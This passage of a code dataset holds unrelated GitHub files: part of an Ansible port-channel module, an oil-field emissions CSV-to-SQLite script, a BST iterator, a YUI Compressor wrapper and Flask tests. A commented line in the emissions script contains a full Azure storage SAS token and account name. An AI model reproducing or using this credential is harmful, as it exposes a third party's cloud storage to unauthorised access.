with open(os.path.join(portchannel_supervisord_path, \"portchannel-{}.conf\".format(conf[\"name\"])), 'w') as fd:\n fd.write(t.render(conf))\n refresh_supervisord(module)\n\n\ndef remove_supervisor_conf(module, teamd_config):\n for conf in teamd_config:\n try:\n os.remove(os.path.join(portchannel_supervisord_path,\n \"portchannel-{}.conf\".format(conf[\"name\"])))\n except Exception:\n pass\n refresh_supervisord(module)\n\n\ndef enable_portchannel(module, teamd_config):\n for conf in teamd_config:\n for intf in conf[\"intfs\"]:\n exec_command(module, \"ip link set dev {} down\".format(intf))\n exec_command(\n module, \"supervisorctl start portchannel-{}\".format(conf[\"name\"]))\n for count in range(0, 60):\n time.sleep(1)\n status = get_portchannel_status(module, conf[\"name\"])\n if u'RUNNING' == status:\n break\n assert u'RUNNING' == status\n exec_command(module, \"ip link set dev {} up\".format(conf[\"name\"]))\n\n\ndef disable_portchannel(module, teamd_config):\n for conf in teamd_config:\n exec_command(\n module, cmd=\"supervisorctl stop portchannel-{}\".format(conf[\"name\"]), ignore_error=True)\n\n\ndef setup_portchannel_conf():\n try:\n os.mkdir(portchannel_conf_path, 0o755)\n except OSError:\n pass\n\n\ndef main():\n module = AnsibleModule(\n argument_spec=dict(\n cmd=dict(required=True, choices=['start', 'stop'], type='str'),\n portchannel_config=dict(required=True, type='dict'),\n ),\n supports_check_mode=False)\n cmd = module.params['cmd']\n portchannel_config = module.params['portchannel_config']\n teamd_config = parse_teamd_config(module, portchannel_config)\n\n setup_portchannel_conf()\n\n try:\n if cmd == 'start':\n create_teamd_conf(module, teamd_config)\n create_supervisor_conf(module, teamd_config)\n enable_portchannel(module, teamd_config)\n elif cmd == 'stop':\n disable_portchannel(module, teamd_config)\n remove_supervisor_conf(module, teamd_config)\n remove_teamd_conf(module, teamd_config)\n except Exception:\n module.fail_json(msg=traceback.format_exc())\n\n module.exit_json()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"sonic-net/sonic-mgmt","sub_path":"ansible/library/ptf_portchannel.py","file_name":"ptf_portchannel.py","file_ext":"py","file_size_in_byte":5559,"program_lang":"python","lang":"en","doc_type":"code","stars":161,"dataset":"github-code","pt":"51"} +{"seq_id":"27174316752","text":"import pandas as pd\nimport numpy as np\nimport os\n\n# Load all csvs files into csvs folder\n#os.system(\"az storage blob download-batch --destination '../Upstream/csvs' --source csvs --sas-token '?sv=2020-08-04&ss=bfqt&srt=sco&sp=rl&se=2022-10-14T03:32:20Z&st=2021-10-13T19:32:20Z&spr=https&sig=WL8KGvOgEve5iluhVafKP0MMMkkBOPmluV3%2B8LGAFb8%3D' --account-name ocirmistorage\")\n\n# Extracting Data from csvs folder \n# Get the directory of all csv files\nd = '../Upstream/csvs/'\ndirectory = os.fsencode('../Upstream/csvs')\nlist_csv =[]\nfor file in os.listdir(directory):\n filename = os.fsdecode(file)\n if filename.endswith('.csv') and filename.startswith('2') and 'Gas_nofrack_nolng.xlsm-Gannet A' not in filename: \n #print(filename)\n list_csv.append(filename)\n continue\n else:\n continue\n\nprint('Extract data needed from all results.csv files...')\n\nlist_results = []\nfor filename in list_csv:\n if filename.endswith('Results.csv'):\n list_results.append(filename)\n\ncolumn_names = [ \n'Downhole pump',\n 'Water reinjection ',\n 'Natural gas reinjection',\n 'Water flooding',\n 'Gas lifting',\n 'Gas flooding',\n 'Steam flooding',\n 'Oil sands mine (integrated with 
upgrader)',\n 'Oil sands mine (non-integrated with upgrader)',\n 'Field location (Country)',\n 'Field_name',\n 'Field age',\n 'Field depth',\n 'Oil production volume',\n 'Number of producing wells',\n 'Number of water injecting wells',\n 'Production tubing diameter',\n 'Productivity index',\n 'Reservoir pressure',\n 'Reservoir temperature',\n 'Offshore?',\n 'API gravity',\n 'Gas composition N2',\n 'Gas composition CO2',\n 'Gas composition C1',\n 'Gas composition C2',\n 'Gas composition C3',\n 'Gas composition C4+',\n 'Gas composition H2S',\n 'Gas-to-oil ratio (GOR)',\n 'Water-to-oil ratio (WOR)',\n 'Water injection ratio',\n 'Gas lifting injection ratio',\n 'Gas flooding injection ratio',\n 'Flood gas ',\n 'Liquids unloading practice',\n 'Fraction of CO2 breaking through to producers',\n 'Source of makeup CO2',\n 'Percentage of sequestration credit assigned to the oilfield',\n 'Steam-to-oil ratio (SOR)',\n 'Fraction of required electricity generated onsite',\n 'Fraction of remaining natural gas reinjected',\n 'Fraction of produced water reinjected',\n 'Fraction of steam generation via cogeneration ',\n 'Fraction of steam generation via solar thermal',\n 'Heater/treater',\n 'Stabilizer column',\n 'Upgrader type',\n 'Associated Gas Processing Path',\n 'Flaring-to-oil ratio',\n 'Venting-to-oil ratio (purposeful)',\n 'Volume fraction of diluent',\n 'Low carbon richness (semi-arid grasslands)',\n 'Moderate carbon richness (mixed)',\n 'High carbon richness (forested)',\n 'Low intensity development and low oxidation',\n 'Moderate intensity development and moderate oxidation',\n 'High intensity development and high oxidation',\n 'Ocean tanker',\n 'Barge',\n 'Pipeline',\n 'Rail',\n 'Truck',\n 'Transport distance (one way) - Ocean tanker',\n 'Transport distance (one way) - Barge',\n 'Transport distance (one way) - Pipeline',\n 'Transport distance (one way) - Rail',\n 'Transport distance (one way) - Truck',\n 'Ocean tanker size, if applicable',\n 'Small sources emissions',\n 'e-Total energy consumption','e-Total GHG emissions', \n 'e-Total GHG emissions-Combustion/land use','e-Total GHG emissions-VFF',\n 'd-Total energy consumption','d-Total GHG emissions', \n 'd-Total GHG emissions-Combustion/land use','d-Total GHG emissions-VFF',\n 'p-Total energy consumption','p-Total GHG emissions', \n 'p-Total GHG emissions-Combustion/land use','p-Total GHG emissions-VFF',\n 's-Total energy consumption','s-Total GHG emissions', \n 's-Total GHG emissions-Combustion/land use','s-Total GHG emissions-VFF',\n 'l-Total energy consumption','l-Total GHG emissions', \n 'l-Total GHG emissions-Combustion/land use','l-Total GHG emissions-VFF',\n 'm-Total energy consumption','m-Total GHG emissions', \n 'm-Total GHG emissions-Combustion/land use','m-Total GHG emissions-VFF',\n 'w-Total energy consumption','w-Total GHG emissions', \n 'w-Total GHG emissions-Combustion/land use','w-Total GHG emissions-VFF',\n 't-Total energy consumption','t-Total GHG emissions', \n 't-Total GHG emissions-Combustion/land use','t-Total GHG emissions-VFF','t-Loss factor',\n 'g-Total energy consumption','g-Total GHG emissions', \n 'g-Total GHG emissions-Combustion/land use','g-Total GHG emissions-VFF',\n 'Other small sources','Offsite emissions credit/debit','Lifecycle energy consumption',\n 'CSS-Total CO2 sequestered','Lifecycle GHG emissions','Field-by-field check']\n\n# function to extract results from one csv an store in a dataframe\ndef clean_df(df,column_names):\n '''clean the df and transpose to map the column names'''\n df = df.iloc[: , 
7:]\n df = df.iloc[[8,9,10,11,12,13,14,15,16,19,20,21,22,23,24,25,26,27,28,29,30,33,35,36,37,38,39,40,41,45,46,47,48,49,\n 50,54,57,58,61,62,63,64,65,66,67,69,70,71,76,85,86,87,91,92,93,95,96,97,101,102,103,104,105,107,108,109,110,\n 111,112,114,129,130,131,132,135,136,137,138,141,142,143,144,147,148,149,150,153,154,155,156,159,160,161,162,\n 165,166,167,168,171,172,173,174,175,178,179,180,181,183,185,187,190,192,194]]\n df_t = df.transpose()\n df_t.columns = column_names\n df_t = df_t.dropna(how = 'all')\n return df_t\n\nlist_df =[]\nfor file in list_results:\n try:\n df = pd.read_csv(d+file,header = None) \n result = clean_df(df,column_names)\n result['original_file']=file.split('-')[0]\n result['year']=file.split('-')[0][:-5].split('_')[0]\n result['field_type']=file.split('-')[0][:-5].split('_')[1].lower()\n result['frack?']= True if file.split('-')[0][:-5].split('_')[2].lower()=='frack' else False\n result['lng?']= True if file.split('-')[0][:-5].split('_')[3].lower()=='lng' else False\n result['Field_name'] = ('-'.join(file.split('-')[1:-1])).strip()\n list_df.append(result)\n except:\n print(\"problematic files\" + d+file)\n\nresults_df = pd.concat(list_df)\n\n\n# Converting all numerical columns into float type\n\nnumerical_columns = [\n 'Field age',\n 'Field depth',\n 'Oil production volume',\n 'Number of producing wells',\n 'Number of water injecting wells',\n 'Production tubing diameter',\n 'Productivity index',\n 'Reservoir pressure',\n 'Reservoir temperature',\n 'Offshore?',\n 'API gravity',\n 'Gas composition N2',\n 'Gas composition CO2',\n 'Gas composition C1',\n 'Gas composition C2',\n 'Gas composition C3',\n 'Gas composition C4+',\n 'Gas composition H2S',\n 'Gas-to-oil ratio (GOR)',\n 'Water-to-oil ratio (WOR)',\n 'Water injection ratio',\n 'Gas lifting injection ratio',\n 'Gas flooding injection ratio',\n 'Flood gas ',\n 'Liquids unloading practice',\n 'Fraction of CO2 breaking through to producers',\n 'Source of makeup CO2',\n 'Percentage of sequestration credit assigned to the oilfield',\n 'Steam-to-oil ratio (SOR)',\n 'Fraction of required electricity generated onsite',\n 'Fraction of remaining natural gas reinjected',\n 'Fraction of produced water reinjected',\n 'Fraction of steam generation via cogeneration ',\n 'Fraction of steam generation via solar thermal',\n 'Heater/treater',\n 'Stabilizer column',\n 'Upgrader type',\n 'Associated Gas Processing Path',\n 'Flaring-to-oil ratio',\n 'Venting-to-oil ratio (purposeful)',\n 'Volume fraction of diluent',\n 'Low carbon richness (semi-arid grasslands)',\n 'Moderate carbon richness (mixed)',\n 'High carbon richness (forested)',\n 'Low intensity development and low oxidation',\n 'Moderate intensity development and moderate oxidation',\n 'High intensity development and high oxidation',\n 'Ocean tanker',\n 'Barge',\n 'Pipeline',\n 'Rail',\n 'Truck',\n 'Transport distance (one way) - Ocean tanker',\n 'Transport distance (one way) - Barge',\n 'Transport distance (one way) - Pipeline',\n 'Transport distance (one way) - Rail',\n 'Transport distance (one way) - Truck',\n 'Ocean tanker size, if applicable',\n 'Small sources emissions',\n 'e-Total energy consumption',\n 'e-Total GHG emissions',\n 'e-Total GHG emissions-Combustion/land use',\n 'e-Total GHG emissions-VFF',\n 'd-Total energy consumption',\n 'd-Total GHG emissions',\n 'd-Total GHG emissions-Combustion/land use',\n 'd-Total GHG emissions-VFF',\n 'p-Total energy consumption',\n 'p-Total GHG emissions',\n 'p-Total GHG emissions-Combustion/land use',\n 'p-Total GHG 
emissions-VFF',\n 's-Total energy consumption',\n 's-Total GHG emissions',\n 's-Total GHG emissions-Combustion/land use',\n 's-Total GHG emissions-VFF',\n 'l-Total energy consumption',\n 'l-Total GHG emissions',\n 'l-Total GHG emissions-Combustion/land use',\n 'l-Total GHG emissions-VFF',\n 'm-Total energy consumption',\n 'm-Total GHG emissions',\n 'm-Total GHG emissions-Combustion/land use',\n 'm-Total GHG emissions-VFF',\n 'w-Total energy consumption',\n 'w-Total GHG emissions',\n 'w-Total GHG emissions-Combustion/land use',\n 'w-Total GHG emissions-VFF',\n 't-Total energy consumption',\n 't-Total GHG emissions',\n 't-Total GHG emissions-Combustion/land use',\n 't-Total GHG emissions-VFF',\n 't-Loss factor',\n 'g-Total energy consumption',\n 'g-Total GHG emissions',\n 'g-Total GHG emissions-Combustion/land use',\n 'g-Total GHG emissions-VFF',\n 'Other small sources',\n 'Offsite emissions credit/debit',\n 'Lifecycle energy consumption',\n 'CSS-Total CO2 sequestered',\n 'Lifecycle GHG emissions']\n\nresults_df = results_df.replace(r'^\\s+$', np.nan, regex=True)\n\nresults_df = results_df.replace(r'\\\\', np.nan, regex=True)\n\nresults_df.reset_index(inplace = True)\n\nresults_df.drop(columns = 'index',inplace = True)\n\nresults_df[numerical_columns]= results_df[numerical_columns].astype(float)\n\nresults_df['Field_name']=results_df['Field_name'].apply(lambda x: x.strip())\n\nprint('Extract data needed from all energy summary.csv files...')\n\nlist_energy_summary = []\nfor filename in list_csv:\n if filename.endswith('Energy Summary.csv'):\n list_energy_summary.append(filename)\n\nES_MJperd =[]\nES_mmbtuperd = []\nES_Energy_Density_crude_oil = []\nES_Energy_Density_petcoke = []\nES_Energy_Density_C2 = []\nES_Energy_Density_C3 = []\nES_Energy_Density_C4 = []\nES_Crude_output = []\nES_Gas_output = []\nES_NGL_output = []\nES_Gas_output_MJ = []\nES_Petcoke_fuel =[]\nField_name = []\noriginal_file = []\n\nfor file in list_energy_summary:\n df = pd.read_csv(d+file,header=None)\n ES_MJperd.append(float(df.iloc[127,5]))\n ES_mmbtuperd.append(float(df.iloc[127,4]))\n ES_Energy_Density_crude_oil.append(float(df.iloc[132,12]))\n ES_Energy_Density_petcoke.append(float(df.iloc[134,12]))\n ES_Energy_Density_C2.append(float(df.iloc[140,12]))\n ES_Energy_Density_C3.append(float(df.iloc[141,12]))\n ES_Energy_Density_C4.append(float(df.iloc[142,12]))\n \n ES_Crude_output.append(float(df.iloc[88,4]))\n ES_Gas_output.append(float(df.iloc[84,4]))\n \n if df.iloc[120,3] == 'Gas':\n ES_Gas_output_MJ.append(float(df.iloc[120,5]))\n else:\n ES_Gas_output_MJ.append(float(df.iloc[123,5]))\n \n ES_NGL_output.append(float(df.iloc[86,4]))\n ES_Petcoke_fuel.append(float(df.iloc[76,4]))\n Field_name.append(('-'.join(file.split('-')[1:-1])).strip())\n #Field_name.append(df.iloc[0,7].strip())\n original_file.append(file.split('-')[0])\n\nenergy_summary = pd.DataFrame({'Field_name':Field_name,'original_file':original_file,\n 'ES_MJperd':ES_MJperd,'ES_mmbtuperd':ES_mmbtuperd,\n 'ES_Energy_Density_crude(mmbtu/t)':ES_Energy_Density_crude_oil,'ES_Energy_Density_petcoke(mmbtu/t)':ES_Energy_Density_petcoke,\n 'ES_Energy_Density_C2(mmbtu/t)':ES_Energy_Density_C2,'ES_Energy_Density_C3(mmbtu/t)':ES_Energy_Density_C3,\n 'ES_Energy_Density_C4(mmbtu/t)':ES_Energy_Density_C4, 'ES_Crude_output(mmbut/d)':ES_Crude_output,\n 'ES_Gas_output(mmbtu/d)':ES_Gas_output, 'ES_NGL_output(mmbtu/d)':ES_NGL_output,\n 'ES_Gas_output(MJ/d)':ES_Gas_output_MJ,'ES_Petcoke_fuel(mmbtu/d)':ES_Petcoke_fuel})\n\n\nresults_ES = 
results_df.merge(energy_summary,how='outer',indicator = True)\n\nif results_ES[results_ES['_merge']!='both'].shape[0]>0:\n print('Unmatched Field: Results // Energy Summary. Check the merge')\n print(results_ES[results_ES['_merge']!='both'])\n results_ES.drop(columns = '_merge',inplace = True)\nelse:\n results_ES.drop(columns = '_merge',inplace = True)\n\n\n\nresults_ES['tCO2e/yr']=results_ES['Lifecycle GHG emissions']*\\\n results_ES['ES_MJperd']/10**6*365\n\nprint('Extract methane emission from flaring.csv files...')\n\nlist_flaring=[]\nfor filename in list_csv:\n if filename.endswith('Flaring.csv'):\n list_flaring.append(filename)\n\nflaring_ch4 =[]\nField_name = []\noriginal_file = []\n\nfor file in list_flaring:\n df = pd.read_csv(d+file,header=None)\n flaring_ch4.append(float(df.iloc[80,12]))\n Field_name.append(('-'.join(file.split('-')[1:-1])).strip())\n original_file.append((file.split('-')[0]))\n\nflaring = pd.DataFrame({'flaring_ch4(t/d)':flaring_ch4,'Field_name':Field_name,'original_file':original_file})\n\nprint('Extract co2 and methane emission from vff summary.csv files...')\n\nlist_vff=[]\nfor filename in list_csv:\n if filename.endswith('VFF Summary.csv'):\n list_vff.append(filename)\n\nventing_ch4 =[]\n\nventing_ch4_miq = []\nventing_ch4_uponly = []\n\nfugitive_ch4 =[]\n\nfugitive_ch4_miq = []\nfugitive_ch4_uponly = []\nventing_production_ch4 = []\nventing_gatherboostprocesss_ch4 = []\nventing_transmissionstorage_ch4 = []\nventing_2ndproduction_ch4 = []\nfugitive_production_ch4 = []\nfugitive_gatherboostprocesss_ch4 = []\nfugitive_transmissionstorage_ch4 =[]\nfugitive_2ndproduction_ch4 = []\n\n\n\nventing_co2 = []\nfugitive_co2 = []\nField_name = []\noriginal_file = []\nfor file in list_vff:\n df = pd.read_csv(d+file,header=None)\n venting_ch4.append(sum(df.iloc[111:157,9].apply(lambda x:float(x))))\n fugitive_ch4.append(sum(df.iloc[111:157,10].apply(lambda x:float(x))))\n venting_co2.append(sum(df.iloc[111:157,7].apply(lambda x:float(x))))\n fugitive_co2.append(sum(df.iloc[111:157,8].apply(lambda x:float(x))))\n \n venting_production_ch4.append(sum(df.iloc[111:131,9].apply(lambda x:float(x))))\n venting_gatherboostprocesss_ch4.append(sum(df.iloc[131:136,9].apply(lambda x:float(x))))\n venting_transmissionstorage_ch4.append(sum(df.iloc[136:141,9].apply(lambda x:float(x))))\n venting_2ndproduction_ch4.append(sum(df.iloc[147:157,9].apply(lambda x:float(x))))\n \n fugitive_production_ch4.append(sum(df.iloc[111:131,10].apply(lambda x:float(x))))\n fugitive_gatherboostprocesss_ch4.append(sum(df.iloc[131:136,10].apply(lambda x:float(x))))\n fugitive_transmissionstorage_ch4.append(sum(df.iloc[136:141,10].apply(lambda x:float(x))))\n fugitive_2ndproduction_ch4.append(sum(df.iloc[147:157,10].apply(lambda x:float(x))))\n \n venting_ch4_miq= [sum(x) for x in zip(venting_production_ch4, venting_2ndproduction_ch4)]\n fugitive_ch4_miq= [sum(x) for x in zip(fugitive_production_ch4, fugitive_2ndproduction_ch4)]\n\n venting_ch4_uponly = [sum(x) for x in zip(venting_production_ch4,venting_gatherboostprocesss_ch4,venting_2ndproduction_ch4)]\n fugitive_ch4_uponly = [sum(x) for x in zip(fugitive_production_ch4,fugitive_gatherboostprocesss_ch4,fugitive_2ndproduction_ch4)]\n Field_name.append(('-'.join(file.split('-')[1:-1])).strip())\n #Field_name.append(df.iloc[0,7].strip())\n original_file.append((file.split('-')[0]))\n\n\n\n\nvff = pd.DataFrame({'Field_name':Field_name,'original_file':original_file,\n 'venting_ch4(t/d)':venting_ch4,'fugitive_ch4(t/d)':fugitive_ch4,\n 
'venting_co2(t/d)':venting_co2,'fugitive_co2(t/d)':fugitive_co2,\n 'venting_ch4_miq(t/d)':venting_ch4_miq,'fugitive_ch4_miq(t/d)':fugitive_ch4_miq,\n 'venting_ch4_uponly(t/d)':venting_ch4_uponly,'fugitive_ch4_uponly(t/d)':fugitive_ch4_uponly,\n 'ch4_production(t/d)': [sum(x) for x in zip(venting_production_ch4,fugitive_production_ch4)],\n 'ch4_gatherboostprocess(t/d)': [sum(x) for x in zip(venting_gatherboostprocesss_ch4,fugitive_gatherboostprocesss_ch4)],\n 'ch4_transmissionstorage(t/d)': [sum(x) for x in zip(venting_transmissionstorage_ch4,fugitive_transmissionstorage_ch4)],\n 'ch4_2ndproduction(t/d)':[sum(x) for x in zip(venting_2ndproduction_ch4,fugitive_2ndproduction_ch4)]})\n\n\n# merge flaring and vff to calculate methane emission \nch4_co2 = vff.merge(flaring,how ='outer',indicator = True)\n\n\nif ch4_co2[ch4_co2['_merge']!='both'].shape[0]>0:\n print('Unmatched Field: vff // flaring. Check the merge')\n print(ch4_co2[ch4_co2['_merge']!='both'])\n ch4_co2.drop(columns = '_merge',inplace = True)\nelse:\n ch4_co2.drop(columns = '_merge',inplace = True)\n\nch4_co2['tCH4/year'] = (ch4_co2['flaring_ch4(t/d)']+ch4_co2['venting_ch4(t/d)']+ch4_co2['fugitive_ch4(t/d)'])*365\nch4_co2['tCH4/year-miQ']=(ch4_co2['flaring_ch4(t/d)']+ch4_co2['venting_ch4_miq(t/d)']+ch4_co2['fugitive_ch4_miq(t/d)'])*365\n\n\n\n\n# merge results, energy summary, flaring and vff \nresults_ES_ch4_co2 = results_ES.merge(ch4_co2,how='outer',indicator = True)\n\n\nif results_ES_ch4_co2[results_ES_ch4_co2['_merge']!='both'].shape[0]>0:\n print('Unmatched Field: results_ES // ch4_co2. Check the merge')\n print(results_ES_ch4_co2[results_ES_ch4_co2['_merge']!='both'])\n results_ES_ch4_co2.drop(columns = '_merge',inplace = True)\nelse:\n results_ES_ch4_co2.drop(columns = '_merge',inplace = True)\n\n# results_ES_ch4_co2['Field Methane Intensity(kgCH4/boe)']=results_ES_ch4_co2['tCH4/year']*1000/results_ES_ch4_co2['annual production(boe/yr)']\n\n#results_ES_ch4_co2['fugitive intensity(kgCH4/boe)']= results_ES_ch4_co2['fugitive_ch4(t/d)']*1000*365/results_ES_ch4_co2['annual production(boe/yr)']\n#results_ES_ch4_co2['venting intensity(kgCH4/boe)']= results_ES_ch4_co2['venting_ch4(t/d)']*1000*365/results_ES_ch4_co2['annual production(boe/yr)']\n#results_ES_ch4_co2['flaring intensity(kgCH4/boe)']= results_ES_ch4_co2['flaring_ch4(t/d)']*1000*365/results_ES_ch4_co2['annual production(boe/yr)']\n\n# Extract data from allocation.csv files\n# Commenting out as we are not using allocation sheet anymore.\n\n# list_allocation=[]\n# for filename in list_csv:\n# if filename.endswith('Allocation.csv'):\n# list_allocation.append(filename)\n\n# allocation_crude = [] #Allocation!H24\n# allocation_NGL = [] #H14\n# allocation_petcoke = [] #H30 \n# allocation_gas = [] #H33\n \n# Field_name = []\n# original_file = []\n# for file in list_allocation:\n# df = pd.read_csv(d+file,header=None)\n# allocation_crude.append(float(df.iloc[23,7]))\n# allocation_NGL.append(float(df.iloc[13,7]))\n# allocation_petcoke.append(float(df.iloc[16,7]))\n# allocation_gas.append(float(df.iloc[14,7]))\n# Field_name.append(('-'.join(file.split('-')[1:-1])).strip())\n# original_file.append((file.split('-')[0]))\n\n# allocation = pd.DataFrame({'Field_name':Field_name,'original_file':original_file,\n# 'allocation_crude(mmbtu/d)':allocation_crude,'allocation_NGL(mmbtu/d)':allocation_NGL,\n# 'allocation_petcoke(mmbtu/d)':allocation_petcoke, 'allocation_gas(mmbtu/d)':allocation_gas})\n\n# merge results, energy summary, flaring, vff, allocation tabs\n#results_ES_ch4_co2_allo = 
pd.merge(results_ES_ch4_co2,allocation,left_on=['original_file','Field name'],right_on=['original_file','Field_name'],how='left')\n\nprint('Extract data from flow sheet.csv files...')\nlist_FS=[]\nfor filename in list_csv:\n if filename.endswith('Flow Sheet.csv'):\n list_FS.append(filename)\n\nFS_LPG_export_LPG = [] #Flow Sheet!W9\nFS_LPG_export_C2 = [] #W17\nFS_LPG_export_C3 = [] #W18\nFS_LPG_export_C4 = [] #W19 \nFS_Ethane_to_Petchem = [] #CP17\nFS_Petcoke_to_stock =[]\nFS_Gas_at_Wellhead =[] #AF24\n \nField_name = []\noriginal_file = []\nfor file in list_FS:\n df = pd.read_csv(d+file,header=None)\n FS_LPG_export_LPG.append(float(df.iloc[8,22]))\n FS_LPG_export_C2.append(float(df.iloc[16,22]))\n FS_LPG_export_C3.append(float(df.iloc[17,22]))\n FS_LPG_export_C4.append(float(df.iloc[18,22]))\n FS_Ethane_to_Petchem.append(float(df.iloc[16,93]))\n FS_Petcoke_to_stock.append(float(df.iloc[6,214]))\n FS_Gas_at_Wellhead.append(float(df.iloc[23,31]))\n Field_name.append(('-'.join(file.split('-')[1:-1])).strip())\n original_file.append((file.split('-')[0]))\n\nflowsheet = pd.DataFrame({'Field_name':Field_name,'original_file':original_file,\n 'FS_LPG_export_LPG(t/d)':FS_LPG_export_LPG,'FS_LPG_export_C2(t/d)':FS_LPG_export_C2,\n 'FS_LPG_export_C3(t/d)': FS_LPG_export_C3, 'FS_LPG_export_C4(t/d)':FS_LPG_export_C4,\n 'FS_Ethane_to_Petchem(t/d)':FS_Ethane_to_Petchem,\n 'FS_Petcoke_to_stock(t/d)':FS_Petcoke_to_stock,'FS_Gas_at_Wellhead(t/d)':FS_Gas_at_Wellhead})\n\nresults_ES_ch4_co2_fs =results_ES_ch4_co2.merge(flowsheet,how='outer',indicator = True)\nif results_ES_ch4_co2_fs[results_ES_ch4_co2_fs['_merge']!='both'].shape[0]>0:\n print('Unmatched Field: results_ES_ch4_co2 // flowsheet. Check the merge')\n print(results_ES_ch4_co2_fs[results_ES_ch4_co2_fs['_merge']!='both'])\n results_ES_ch4_co2_fs.drop(columns = '_merge',inplace = True)\nelse:\n results_ES_ch4_co2_fs.drop(columns = '_merge',inplace = True)\n\n\n\n\nresults_ES_ch4_co2_fs['GWP']='100yr'\n#results_ES_ch4_co2_fs.to_excel('../Upstream/Analytics/all_upstream_results.xlsx',index = False)\n\n\nprint('Update upstream results in OCI database...')\nimport sqlite3\nconnection = sqlite3.connect(\"../OCI_Database.db\")\nresults_ES_ch4_co2_fs.to_sql('upstream_results', connection, if_exists='replace', index=False)\nprint('Upstream data updates completed.')","repo_name":"RMI/oci_data_processing","sub_path":".ipynb_checkpoints/upstream_data_processing-checkpoint.py","file_name":"upstream_data_processing-checkpoint.py","file_ext":"py","file_size_in_byte":21679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}
+{"seq_id":"71641123038","text":"# Implement an iterator over a binary search tree (BST). \n# Your iterator will be initialized with the root node of a BST.\n\n# Calling next() will return the next smallest number in the BST.\n\n# Note: next() and hasNext() should run in average O(1) \n# time and uses O(h) memory, where h is the height of the tree.\n\n\nclass BSTIterator(object):\n def __init__(self, root):\n \"\"\"\n :type root: TreeNode\n \"\"\"\n self.stack = []\n \n while root:\n self.stack.append(root)\n root = root.left\n\n \n# return a boolean, whether we have a next smallest number\n def hasNext(self):\n \"\"\"\n :rtype: bool\n \"\"\"\n if len(self.stack) > 0:\n return True\n return False\n \n# @return an integer, the next smallest number\n def next(self):\n \"\"\"\n :rtype: int\n \"\"\"\n node = self.stack.pop()\n node_right = node.right\n while node_right:\n self.stack.append(node_right)\n node_right = node_right.left\n return node.val\n ","repo_name":"Gabrielatb/Interview-Prep","sub_path":"leetcode/company specific problems/Amazon/binary_search_tree_iterator.py","file_name":"binary_search_tree_iterator.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"}
+{"seq_id":"13171605100","text":"\"\"\"Minify Javascript and CSS with YUI Compressor. This filter defaults to\r\nJS mode, but it is recommended that you use the 'yui_js' and 'yui_css'\r\nfilters instead.\r\n\r\nYUI Compressor is an external tool, which needs to be available (also, java\r\nis required).\r\n\r\nYou can define a YUI_COMPRESSOR_PATH setting that points to the .jar file.\r\nOtherwise, we will attempt to find the path via an environment variable by\r\nthe same name. The filter will also look for a JAVA_HOME environment\r\nvariable to run the .jar file, or will otherwise assume that \"java\" is\r\non the system path.\r\n\r\nFor more information, see:\r\n http://developer.yahoo.com/yui/compressor/\r\n\"\"\"\r\n\r\nimport os\r\nimport subprocess\r\n\r\nfrom courant.core.assets.conf import settings\r\n\r\n\r\ndef _get_yui_path():\r\n path = getattr(settings, 'YUI_COMPRESSOR_PATH', None)\r\n if not path:\r\n path = os.environ.get('YUI_COMPRESSOR_PATH')\r\n if not path:\r\n raise EnvironmentError('YUI Compressor was not found on '\r\n 'your system. Define a YUI_COMPRESSOR_PATH setting or '\r\n 'environment variable.')\r\n return path\r\n\r\n\r\ndef _get_java_path():\r\n path = os.environ.get('JAVA_HOME')\r\n if path:\r\n return os.path.join(path, 'bin/java')\r\n else:\r\n return 'java'\r\n\r\n# fail early\r\nyui = _get_yui_path()\r\n\r\n\r\ndef apply(_in, out, mode='js'):\r\n java = _get_java_path()\r\n proc = subprocess.Popen(\r\n [java, '-jar', yui, '--type=%s'%mode],\r\n # we cannot use the in/out streams directly, as they might be\r\n # StringIO objects (which are not supported by subprocess)\r\n stdout=subprocess.PIPE,\r\n stdin=subprocess.PIPE,\r\n stderr=subprocess.PIPE)\r\n stdout, stderr = proc.communicate(_in.read())\r\n if proc.returncode:\r\n raise Exception('yui compressor: subprocess returned a '\r\n 'non-success result code: %s' % proc.returncode)\r\n # stderr contains error messages\r\n else:\r\n out.write(stdout)\r\n","repo_name":"maxcutler/Courant-News","sub_path":"courant/core/assets/filter/yui/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1988,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"51"}
+{"seq_id":"786282889","text":"from random import randint\r\nb = [randint(-10,20) for i in range(10)]\r\ndef negative(b):\r\n if len(b) == 0:\r\n return 0\r\n else:\r\n count = negative(b[1:])\r\n if b[0] < 0:\r\n count+=1\r\n return count\r\n\r\nprint(b)\r\nprint(negative(b))","repo_name":"E-bait/Proj_1sem_Semerunin","sub_path":"zd1-8/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}
+{"seq_id":"41205905466","text":"import unittest\nfrom flask import url_for\nfrom flask_testing import TestCase\n\nfrom application import app, db\nfrom application.models import Fish, Catches\n\nclass TestBase(TestCase):\n\n\tdef create_app(self):\n\t\tapp.config.update(\n\t\t\tSQLALCHEMY_DATABASE_URI=\"sqlite:///test.db\",\n\t\t\tSECRET_KEY='TEST_SECRET_KEY',\n\t\t\tDEBUG=True\n\t\t)\n\t\treturn app\n\n\tdef setUp(self):\n\t\tdb.create_all()\n\t\ttest_fish = Fish(name=\"test fish\", minweight=1800, maxweight=2500)\n\t\tdb.session.add(test_fish)\n\t\tdb.session.commit()\n\t\ttest_catch = Catches(fishname=\"test fish\", fishweight=2030, fishid=test_fish.id, description=\"Jeeez what a catch\")\n\t\tdb.session.add(test_catch)\n\t\tdb.session.commit()\n\n\tdef tearDown(self):\n\t\tdb.session.remove()\n\t\tdb.drop_all()\n\nclass TestViews(TestBase):\n\n# Test each route allows get requests and provides the right status code of 200\n\tdef test_home_get(self):\n\t\tresponse = self.client.get(url_for('home'))\n\t\tself.assertEqual(response.status_code, 200)\n\n\tdef test_create_get(self):\n\t\tresponse = self.client.get(url_for('create'))\n\t\tself.assertEqual(response.status_code, 200)\n\n\tdef test_update_get(self):\n\t\tresponse = self.client.get(url_for('update', id=1))\n\t\tself.assertEqual(response.status_code,200)\n\n# Follow redirects since the delete function works largely on the home page, without redirects being allowed the 302\n# status code is returned, since the delete function redirects immediately to the home page once it has finished.\n\tdef test_delete_get(self):\n\t\tresponse = self.client.get(\n\t\t\turl_for('delete', 